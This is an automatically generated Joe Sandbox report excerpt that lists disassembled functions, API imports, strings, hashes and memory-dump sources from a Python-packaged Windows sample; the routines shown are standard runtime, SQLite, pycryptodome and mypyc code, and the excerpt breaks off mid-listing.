Opcode ID: 0c22d9056acb871eddf48ff6985902c40c9bac8e0db102ec70c3771e64610527
Instruction ID: d6643d836ddce05e505ef507e7c893841d31bc3cea91059f88f5bcc3a000502a
Opcode Fuzzy Hash: 0c22d9056acb871eddf48ff6985902c40c9bac8e0db102ec70c3771e64610527
Instruction Fuzzy Hash: 9C02E5F2B0E682C2E7668B28D44467937A9EB85F84F144175FD4E83694EE3CF846D720

Function 00007FFBAB631960 Relevance: 13.6, APIs: 9, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFBAB63197C
memset.VCRUNTIME140 ref: 00007FFBAB6319A0
RtlCaptureContext.KERNEL32 ref: 00007FFBAB6319A9
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFBAB6319C3
RtlVirtualUnwind.KERNEL32 ref: 00007FFBAB631A04
memset.VCRUNTIME140 ref: 00007FFBAB631A37
IsDebuggerPresent.KERNEL32 ref: 00007FFBAB631A58
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFBAB631A79
UnhandledExceptionFilter.KERNEL32 ref: 00007FFBAB631A84

Memory Dump Source

Source File: 00000002.00000002.1836553428.00007FFBAB631000.00000020.00000001.01000000.00000027.sdmp, Offset: 00007FFBAB630000, based on PE: true

Associated: 00000002.00000002.1836525586.00007FFBAB630000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 00000002.00000002.1836582037.00007FFBAB632000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 00000002.00000002.1836611692.00007FFBAB634000.00000002.00000001.01000000.00000027.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab630000_HyZh4pn0RF.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: 7e91f6bfd96c29140b0d269c20ca028c10e388d05116ed94df9161a84ec9e0c7
Instruction ID: 952a4aa9fdebde8ce766101187a21495dedc64476f46688b09e26c709446d403
Opcode Fuzzy Hash: 7e91f6bfd96c29140b0d269c20ca028c10e388d05116ed94df9161a84ec9e0c7
Instruction Fuzzy Hash: ED313CB360AA818AEB618F79E8507E9B361FB84744F44903ADE5D47AA4DF38D648C710

Function 00007FFBAB621960 Relevance: 13.6, APIs: 9, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFBAB62197C
memset.VCRUNTIME140 ref: 00007FFBAB6219A0
RtlCaptureContext.KERNEL32 ref: 00007FFBAB6219A9
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFBAB6219C3
RtlVirtualUnwind.KERNEL32 ref: 00007FFBAB621A04
memset.VCRUNTIME140 ref: 00007FFBAB621A37
IsDebuggerPresent.KERNEL32 ref: 00007FFBAB621A58
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFBAB621A79
UnhandledExceptionFilter.KERNEL32 ref: 00007FFBAB621A84

Memory Dump Source

Source File: 00000002.00000002.1836441466.00007FFBAB621000.00000020.00000001.01000000.00000028.sdmp, Offset: 00007FFBAB620000, based on PE: true

Associated: 00000002.00000002.1836411766.00007FFBAB620000.00000002.00000001.01000000.00000028.sdmpDownload File
Associated: 00000002.00000002.1836470162.00007FFBAB623000.00000002.00000001.01000000.00000028.sdmpDownload File
Associated: 00000002.00000002.1836497438.00007FFBAB625000.00000002.00000001.01000000.00000028.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab620000_HyZh4pn0RF.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: 15ab57132a56a43adcf6d314196c4535093efc661be566aed9b6740bd42d3de9
Instruction ID: 58c829ed806592a65f982e232583cafe98d9f6479d06213aa3bc76bd974fd9b9
Opcode Fuzzy Hash: 15ab57132a56a43adcf6d314196c4535093efc661be566aed9b6740bd42d3de9
Instruction Fuzzy Hash: C1314FB2A09A8189FB658F74E8507EDB360FB84744F44903ADE5E47BA4DF38D648C714

Function 00007FFBAB611960 Relevance: 13.6, APIs: 9, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFBAB61197C
memset.VCRUNTIME140 ref: 00007FFBAB6119A0
RtlCaptureContext.KERNEL32 ref: 00007FFBAB6119A9
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFBAB6119C3
RtlVirtualUnwind.KERNEL32 ref: 00007FFBAB611A04
memset.VCRUNTIME140 ref: 00007FFBAB611A37
IsDebuggerPresent.KERNEL32 ref: 00007FFBAB611A58
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFBAB611A79
UnhandledExceptionFilter.KERNEL32 ref: 00007FFBAB611A84

Memory Dump Source

Source File: 00000002.00000002.1836320124.00007FFBAB611000.00000020.00000001.01000000.00000029.sdmp, Offset: 00007FFBAB610000, based on PE: true

Associated: 00000002.00000002.1836281824.00007FFBAB610000.00000002.00000001.01000000.00000029.sdmpDownload File
Associated: 00000002.00000002.1836352217.00007FFBAB613000.00000002.00000001.01000000.00000029.sdmpDownload File
Associated: 00000002.00000002.1836382631.00007FFBAB615000.00000002.00000001.01000000.00000029.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab610000_HyZh4pn0RF.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: 15ab57132a56a43adcf6d314196c4535093efc661be566aed9b6740bd42d3de9
Instruction ID: 5e0726e60b40d6c90a1f26852d1638d950dad0d5289a4c0946d339926f154fd9
Opcode Fuzzy Hash: 15ab57132a56a43adcf6d314196c4535093efc661be566aed9b6740bd42d3de9
Instruction Fuzzy Hash: D5318FB260AA8199EB618F74F8503EDB3A4FB84344F44943ADE5E47AA4DF3CD248C700

Function 00007FFBAB6B42E8 Relevance: 13.6, APIs: 9, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFBAB6B4304
memset.VCRUNTIME140 ref: 00007FFBAB6B4328
RtlCaptureContext.KERNEL32 ref: 00007FFBAB6B4331
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFBAB6B434B
RtlVirtualUnwind.KERNEL32 ref: 00007FFBAB6B438C
memset.VCRUNTIME140 ref: 00007FFBAB6B43BF
IsDebuggerPresent.KERNEL32 ref: 00007FFBAB6B43E0
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFBAB6B4401
UnhandledExceptionFilter.KERNEL32 ref: 00007FFBAB6B440C

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: 163f402a1fb0e79306561b7d1351dc0227e06d1d27abfb67021ae25e867ac1b0
Instruction ID: 981421dbad6fe0e80db7a107e1953423d9504c1928d1bbb981c86daa0a5a0e68
Opcode Fuzzy Hash: 163f402a1fb0e79306561b7d1351dc0227e06d1d27abfb67021ae25e867ac1b0
Instruction Fuzzy Hash: C2315DB265AB8186EB618FB4E8503EDB370FB84744F44943ADA5E47AA4EF3CD548C710

Function 00007FFBAB651960 Relevance: 13.6, APIs: 9, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFBAB65197C
memset.VCRUNTIME140 ref: 00007FFBAB6519A0
RtlCaptureContext.KERNEL32 ref: 00007FFBAB6519A9
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFBAB6519C3
RtlVirtualUnwind.KERNEL32 ref: 00007FFBAB651A04
memset.VCRUNTIME140 ref: 00007FFBAB651A37
IsDebuggerPresent.KERNEL32 ref: 00007FFBAB651A58
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFBAB651A79
UnhandledExceptionFilter.KERNEL32 ref: 00007FFBAB651A84

Memory Dump Source

Source File: 00000002.00000002.1836808470.00007FFBAB651000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FFBAB650000, based on PE: true

Associated: 00000002.00000002.1836782497.00007FFBAB650000.00000002.00000001.01000000.00000025.sdmpDownload File
Associated: 00000002.00000002.1836836073.00007FFBAB653000.00000002.00000001.01000000.00000025.sdmpDownload File
Associated: 00000002.00000002.1836866266.00007FFBAB655000.00000002.00000001.01000000.00000025.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab650000_HyZh4pn0RF.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: 15ab57132a56a43adcf6d314196c4535093efc661be566aed9b6740bd42d3de9
Instruction ID: aaa187eadd4220961afedd73fb32ec06e212def85640b6c63253aaa5d9479d87
Opcode Fuzzy Hash: 15ab57132a56a43adcf6d314196c4535093efc661be566aed9b6740bd42d3de9
Instruction Fuzzy Hash: 7A3181B2605B8185EB618F74E850BEDB360FB44744F44913ADE5E436A8DF38D158C710

Function 00007FFBAA463068 Relevance: 13.6, APIs: 9, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFBAA463084
memset.VCRUNTIME140 ref: 00007FFBAA4630A8
RtlCaptureContext.KERNEL32 ref: 00007FFBAA4630B1
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFBAA4630CB
RtlVirtualUnwind.KERNEL32 ref: 00007FFBAA46310C
memset.VCRUNTIME140 ref: 00007FFBAA46313F
IsDebuggerPresent.KERNEL32 ref: 00007FFBAA463160
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFBAA463181
UnhandledExceptionFilter.KERNEL32 ref: 00007FFBAA46318C

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: 14da1239b2aff37f2225a2b2eb9612ff8327347efab586c9ed8106aec9f5eecf
Instruction ID: d0878b696e0e47b5915b48675d68046d06825c230eaa39e56bb26486b3f35b2e
Opcode Fuzzy Hash: 14da1239b2aff37f2225a2b2eb9612ff8327347efab586c9ed8106aec9f5eecf
Instruction Fuzzy Hash: FF314DB260ABC1C5EB618F70E8503ED7368FB84B44F44443AEA4E47A98DF38D549C720

Function 00007FFBAB661960 Relevance: 13.6, APIs: 9, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFBAB66197C
memset.VCRUNTIME140 ref: 00007FFBAB6619A0
RtlCaptureContext.KERNEL32 ref: 00007FFBAB6619A9
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFBAB6619C3
RtlVirtualUnwind.KERNEL32 ref: 00007FFBAB661A04
memset.VCRUNTIME140 ref: 00007FFBAB661A37
IsDebuggerPresent.KERNEL32 ref: 00007FFBAB661A58
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFBAB661A79
UnhandledExceptionFilter.KERNEL32 ref: 00007FFBAB661A84

Memory Dump Source

Source File: 00000002.00000002.1836922455.00007FFBAB661000.00000020.00000001.01000000.00000024.sdmp, Offset: 00007FFBAB660000, based on PE: true

Associated: 00000002.00000002.1836892940.00007FFBAB660000.00000002.00000001.01000000.00000024.sdmpDownload File
Associated: 00000002.00000002.1836950286.00007FFBAB665000.00000002.00000001.01000000.00000024.sdmpDownload File
Associated: 00000002.00000002.1836978076.00007FFBAB666000.00000004.00000001.01000000.00000024.sdmpDownload File
Associated: 00000002.00000002.1837005009.00007FFBAB667000.00000002.00000001.01000000.00000024.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab660000_HyZh4pn0RF.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: 5fe31fd096c1bad991f81fc54a17c152ef0039d236a239c089c20b1045aa1978
Instruction ID: 263c2c74a8b2dbc11864663d308552263c095f0f27282676d04fbf5b39491a33
Opcode Fuzzy Hash: 5fe31fd096c1bad991f81fc54a17c152ef0039d236a239c089c20b1045aa1978
Instruction Fuzzy Hash: 863161B2A09A8189EB658F74E8607EDB360FB85744F44943ADE5D476A4DF38D548C700

Function 00007FFBAB5F1960 Relevance: 13.6, APIs: 9, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFBAB5F197C
memset.VCRUNTIME140 ref: 00007FFBAB5F19A0
RtlCaptureContext.KERNEL32 ref: 00007FFBAB5F19A9
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFBAB5F19C3
RtlVirtualUnwind.KERNEL32 ref: 00007FFBAB5F1A04
memset.VCRUNTIME140 ref: 00007FFBAB5F1A37
IsDebuggerPresent.KERNEL32 ref: 00007FFBAB5F1A58
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFBAB5F1A79
UnhandledExceptionFilter.KERNEL32 ref: 00007FFBAB5F1A84

Memory Dump Source

Source File: 00000002.00000002.1835891032.00007FFBAB5F1000.00000020.00000001.01000000.0000002B.sdmp, Offset: 00007FFBAB5F0000, based on PE: true

Associated: 00000002.00000002.1835837141.00007FFBAB5F0000.00000002.00000001.01000000.0000002B.sdmpDownload File
Associated: 00000002.00000002.1835936380.00007FFBAB5F6000.00000002.00000001.01000000.0000002B.sdmpDownload File
Associated: 00000002.00000002.1835980235.00007FFBAB5FB000.00000002.00000001.01000000.0000002B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab5f0000_HyZh4pn0RF.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: b1f9e4b8cb76c58f9ad273c7ab6db637e490d5b196a1216b4705d07cf26add3e
Instruction ID: 2d534ef33d41ad631ae7cf13f553c24eca0aaf625a3a759915628b61016ee886
Opcode Fuzzy Hash: b1f9e4b8cb76c58f9ad273c7ab6db637e490d5b196a1216b4705d07cf26add3e
Instruction Fuzzy Hash: 5C3161B2A05A8185EB618F71E8507EDB364FB44744F44803ADE5E476A5DF38D54CC714

Function 00007FFBAB661D40 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 276COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FFBAB661E03
_wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBAB661EE6
memcpy.VCRUNTIME140 ref: 00007FFBAB661F1E

Strings

D:\a\pycryptodome\pycryptodome\src\hash_SHA2_template.c, xrefs: 00007FFBAB661ED8, 00007FFBAB661F86
hs->curlen < BLOCK_SIZE, xrefs: 00007FFBAB661EDF, 00007FFBAB661F8D

Memory Dump Source

Source File: 00000002.00000002.1836922455.00007FFBAB661000.00000020.00000001.01000000.00000024.sdmp, Offset: 00007FFBAB660000, based on PE: true

Associated: 00000002.00000002.1836892940.00007FFBAB660000.00000002.00000001.01000000.00000024.sdmpDownload File
Associated: 00000002.00000002.1836950286.00007FFBAB665000.00000002.00000001.01000000.00000024.sdmpDownload File
Associated: 00000002.00000002.1836978076.00007FFBAB666000.00000004.00000001.01000000.00000024.sdmpDownload File
Associated: 00000002.00000002.1837005009.00007FFBAB667000.00000002.00000001.01000000.00000024.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab660000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy$_wassert
String ID: D:\a\pycryptodome\pycryptodome\src\hash_SHA2_template.c$hs->curlen < BLOCK_SIZE
API String ID: 4178124637-3286700114
Opcode ID: 6c8687ad2ff289e94dcfd8a461612af8bd826b46b62f56cf6ff31f31de498083
Instruction ID: e0d5cd412fd1a3c9b41a7216672907778707e5931bdb087bc127bf8e6f657907
Opcode Fuzzy Hash: 6c8687ad2ff289e94dcfd8a461612af8bd826b46b62f56cf6ff31f31de498083
Instruction Fuzzy Hash: 51C1B6A2E1968186E706CF38C9546F9E361FBA6788F00E335DF5D56A65EF38E581C300

Function 00007FFBAA58FC70 Relevance: 12.4, APIs: 2, Strings: 6, Instructions: 411COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FFBAA58FCDB
memset.VCRUNTIME140 ref: 00007FFBAA58FD63

Part of subcall function 00007FFBAA58D380: memset.VCRUNTIME140 ref: 00007FFBAA58D3E2

Strings

etilqs_, xrefs: 00007FFBAA58FC92, 00007FFBAA58FF4A
winGetTempname1, xrefs: 00007FFBAA58FE64
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 00007FFBAA58FF90
winGetTempname5, xrefs: 00007FFBAA58FF3C
winGetTempname4, xrefs: 00007FFBAA59023A
winGetTempname2, xrefs: 00007FFBAA58FD96

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memset
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 2221118986-463513059
Opcode ID: 36159124b4084a2650a8faa174063cbbce8546a30164caa7cd0c1d832b3be39e
Instruction ID: 3e47f0c00916182eedab9697c5beae95e9754150ddc668738ca542d5120285b0
Opcode Fuzzy Hash: 36159124b4084a2650a8faa174063cbbce8546a30164caa7cd0c1d832b3be39e
Instruction Fuzzy Hash: 1BE15791B1E3C587DA0E8B39A811178BB94AB4EB80F58517ADE5E437D2DE3CB103D324

Function 00007FFBAA4612F0 Relevance: 10.8, APIs: 7, Instructions: 347COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFBAA4618A0: PyMem_Malloc.PYTHON312 ref: 00007FFBAA461903
Part of subcall function 00007FFBAA4618A0: PyType_IsSubtype.PYTHON312 ref: 00007FFBAA4619F6
Part of subcall function 00007FFBAA4618A0: PyType_IsSubtype.PYTHON312 ref: 00007FFBAA461A53

PyMem_Malloc.PYTHON312 ref: 00007FFBAA461377
PyMem_Free.PYTHON312 ref: 00007FFBAA461487
PyErr_NoMemory.PYTHON312 ref: 00007FFBAA4638AD
_Py_Dealloc.PYTHON312 ref: 00007FFBAA4638C4

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: Mem_$MallocSubtypeType_$DeallocErr_FreeMemory
String ID:
API String ID: 4139299733-0
Opcode ID: 35a4b164d7d926b41929bb2b2ac8d3737955662c15fe271b4beba82657301c78
Instruction ID: 6e08353b1b5efed8d5a5d92c0060229a3045c5796905dc730b48f04b875b72da
Opcode Fuzzy Hash: 35a4b164d7d926b41929bb2b2ac8d3737955662c15fe271b4beba82657301c78
Instruction Fuzzy Hash: 1EE1AFF6E1A592C1EB268B29D4146B966A9FB41F94F1405B5FE4F83680DE3CF8438720

Function 00007FFBAA5A72D0 Relevance: 6.6, APIs: 5, Instructions: 360COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FFBAA5A7462
memset.VCRUNTIME140 ref: 00007FFBAA5A7473
memcpy.VCRUNTIME140 ref: 00007FFBAA5A74E8
memcpy.VCRUNTIME140 ref: 00007FFBAA5A7500
memset.VCRUNTIME140 ref: 00007FFBAA5A750F

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy$memset
String ID:
API String ID: 438689982-0
Opcode ID: 34e0163e64a6ab47a454ebcfa3fdf24bc47e619a7ea06a7069ab159aea8323a2
Instruction ID: 4186e42d9e154acb464bd7fad94ae323e595575bc9d2f8078817a1fa0583bf47
Opcode Fuzzy Hash: 34e0163e64a6ab47a454ebcfa3fdf24bc47e619a7ea06a7069ab159aea8323a2
Instruction Fuzzy Hash: 80E1E0B2B0A781C6E7918E39D0487AD77A9FB4ABC4F008076EE4E87785DE3DD4468714

Function 00007FFBAB6A39D0 Relevance: 73.8, APIs: 30, Strings: 12, Instructions: 293stringmemoryCOMMON

Download Yara Rule

APIs

_PyType_CalculateMetaclass.PYTHON312 ref: 00007FFBAB6A3A3F
PyObject_GetAttrString.PYTHON312 ref: 00007FFBAB6A3A68
PyErr_Clear.PYTHON312 ref: 00007FFBAB6A3A76
PyUnicode_CompareWithASCIIString.PYTHON312 ref: 00007FFBAB6A3A8E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFBAB6A3AA6
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFBAB6A3AB9
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFBAB6A3ACC
PyUnicode_CompareWithASCIIString.PYTHON312 ref: 00007FFBAB6A3AE4
PyUnicode_CompareWithASCIIString.PYTHON312 ref: 00007FFBAB6A3B11
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A3B64
PyErr_SetString.PYTHON312 ref: 00007FFBAB6A3B80
PyUnicode_FromString.PYTHON312 ref: 00007FFBAB6A3B93
PyType_GenericAlloc.PYTHON312 ref: 00007FFBAB6A3BAE
PyObject_SetAttrString.PYTHON312 ref: 00007FFBAB6A3C3B
PyType_Ready.PYTHON312 ref: 00007FFBAB6A3C8A
PyObject_GetAttrString.PYTHON312 ref: 00007FFBAB6A3CAD
PyObject_IsTrue.PYTHON312 ref: 00007FFBAB6A3CC2
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A3CD7
PyErr_SetString.PYTHON312 ref: 00007FFBAB6A3CF2
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A3D06
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A3D1F
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A3D39
PyErr_Clear.PYTHON312 ref: 00007FFBAB6A3D62
PyObject_SetAttrString.PYTHON312 ref: 00007FFBAB6A3D77
_PyObject_FastCall.PYTHON312 ref: 00007FFBAB6A3DA1
_PyObject_GetAttrId.PYTHON312 ref: 00007FFBAB6A3DBD
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A3DD3
PyObject_VectorcallDict.PYTHON312 ref: 00007FFBAB6A3DED
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A3E05
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A3E21

Strings

__orig_bases__, xrefs: 00007FFBAB6A3C31
TypingMeta, xrefs: 00007FFBAB6A3A9C
abc, xrefs: 00007FFBAB6A3B07
GenericMeta, xrefs: 00007FFBAB6A3AAF
ABCMeta, xrefs: 00007FFBAB6A3B1F
_ProtocolMeta, xrefs: 00007FFBAB6A3AC2, 00007FFBAB6A3AF2
__slots__, xrefs: 00007FFBAB6A3C9F
typing_extensions, xrefs: 00007FFBAB6A3ADA
__module__, xrefs: 00007FFBAB6A3A5E, 00007FFBAB6A3D6D
typing, xrefs: 00007FFBAB6A3A81
mypyc classes can't have __slots__, xrefs: 00007FFBAB6A3CE8
mypyc classes can't have a metaclass, xrefs: 00007FFBAB6A3B76

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: String$DeallocObject_$Attr$Err_Unicode_$CompareType_Withstrcmp$Clear$AllocCalculateCallDictFastFromGenericMetaclassReadyTrueVectorcall
String ID: ABCMeta$GenericMeta$TypingMeta$_ProtocolMeta$__module__$__orig_bases__$__slots__$abc$mypyc classes can't have __slots__$mypyc classes can't have a metaclass$typing$typing_extensions
API String ID: 3039355408-3015203947
Opcode ID: 581e7a51ebe161312cd1d03399a5527e61c6b6fd9e8a3dc5876b46a657a736b2
Instruction ID: 972cfd6818fbc9c3039f7ef094d2e8c7d3bfbdc1df2dbae1d9a6bb020b06354f
Opcode Fuzzy Hash: 581e7a51ebe161312cd1d03399a5527e61c6b6fd9e8a3dc5876b46a657a736b2
Instruction Fuzzy Hash: CCD14EB1A4BB4681EA569F7DED142B8A3B0BF55B84F44E039CE2E06271EF3CE5418300

Function 00007FFBAB6A13E0 Relevance: 60.0, APIs: 20, Strings: 14, Instructions: 491stringCOMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON312 ref: 00007FFBAB6A1574
strchr.VCRUNTIME140 ref: 00007FFBAB6A15CE
_PyDict_GetItemStringWithError.PYTHON312 ref: 00007FFBAB6A16F5
PyErr_Occurred.PYTHON312 ref: 00007FFBAB6A1738
